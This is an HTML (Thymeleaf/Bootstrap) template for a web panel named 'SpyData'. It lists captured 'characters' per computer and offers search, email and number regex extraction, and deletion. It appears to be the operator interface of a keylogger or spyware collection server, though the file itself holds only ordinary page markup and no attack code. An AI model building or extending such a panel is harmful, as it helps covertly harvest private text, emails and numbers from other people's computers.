<!DOCTYPE html>
<html xmlns:th="http://www.thymeleaf.org">
<head>
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport"
	content="width=device-width, initial-scale=1, shrink-to-fit=no">

<!-- Bootstrap CSS -->
<link rel="stylesheet"
	href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css"
	integrity="sha384-WskhaSGFgHYWDcbwN70/dfYBj47jz9qbsMId/iRN3ewGhXQFZCSftd1LZCfmhktB"
	crossorigin="anonymous">

<title>Spy data</title>

</head>

<nav class="navbar navbar-expand-lg navbar-light bg-light">
	<a class="navbar-brand" href="/">SpyData</a>
	<button class="navbar-toggler" type="button" data-toggle="collapse"
		data-target="#navbarTogglerDemo02" aria-controls="navbarTogglerDemo02"
		aria-expanded="false" aria-label="Toggle navigation">
		<span class="navbar-toggler-icon"></span>
	</button>

	<div class="collapse navbar-collapse" id="navbarTogglerDemo02">
		<ul class="navbar-nav mr-auto mt-2 mt-lg-0">
			<li class="nav-item active"><a class="nav-link" href="/data">raw
					<span class="sr-only">(current)</span>
			</a></li>
			<li class="nav-item"><a class="nav-link" href="/clear">clear</a>

			<li class="nav-item"><a class="nav-link" href="/regexEmail">regexEmail</a>
			</li>
			<li class="nav-item"><a class="nav-link" href="/regexNumber">regexNumber</a>
			</li>
			<li class="nav-item">
				<!--         <a class="nav-link" href="/delete">deleteAll</a> -->
			</li>
		</ul>
		<form class="form-inline my-2 my-lg-0" method="post"
			action="/contains">
			<input class="form-control mr-sm-2" type="search" name="contains" required="required"
				placeholder="Contains">
			<button class="btn btn-outline-success my-2 my-sm-0" type="submit">Search</button>
		</form>
		<form class="form-inline my-2 my-lg-0" method="post" action="/find">
			<input class="form-control mr-sm-2" type="search" name="computer" required="required"
				placeholder="Computer">
			<button class="btn btn-outline-success my-2 my-sm-0" type="submit">Search</button>
		</form>
	</div>
</nav>

<form class="form-inline" method="post" action="/save2">
	<div class="form-group mb-2">
		<label for="staticEmail2" class="sr-only">Computer</label> <input
			type="text" class="form-control" id="staticEmail2" required="required"
			placeholder="computer" name="computer">
	</div>
	<div class="form-group mx-sm-3 mb-2">
		<label for="inputPassword2" class="sr-only">Password</label> <input
			type="text" class="form-control" id="inputPassword2" name="message" required="required"
			placeholder="message">
	</div>
	<button type="submit" class="btn btn-primary mb-2">Save</button>
</form>


<ul class="list-group">
	<li class="list-group-item delete" th:each="d : ${data}" th:attr="id=${d.id}"
		th:text="${d.characters}" th:title="${d.computer}">
	</li>
</ul>




<body>

	<!-- jQuery first, then Popper.js, then Bootstrap JS -->
	<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
	<script src="/resources/css/popper.min.js"></script>
	<script src="/resources/css/bootstrap.min.js"></script>
	
	
<script>
$(document).ready(function(){
	$(".delete").dblclick(function(){
		let id =$(this).attr("id");
		if(confirm("delete this?")){
		$.get("/delete/"+id, null, function(data, textStatus, req) {})	
		$(this).remove();
		}
})
	
})
</script>
</body>

</html>